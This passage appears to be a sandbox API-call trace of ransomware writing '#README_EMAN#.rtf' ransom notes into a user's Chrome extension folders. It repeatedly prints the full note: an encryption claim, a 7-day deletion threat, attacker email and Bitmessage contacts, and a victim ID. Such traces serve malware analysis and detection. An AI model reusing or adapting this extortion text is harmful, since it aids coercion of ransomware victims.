th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x09K\x09 ", lpUsedDefaultChar=0x0) returned 8717 [0287.628] WriteFile (in: hFile=0x284, lpBuffer=0x1ed4f78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ed4f78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0287.629] CloseHandle (hObject=0x284) returned 1 [0287.629] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\#readme_eman#.rtf")) returned 0xffffffff [0287.629] GetLastError () returned 0x2 [0287.629] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\eu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0287.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 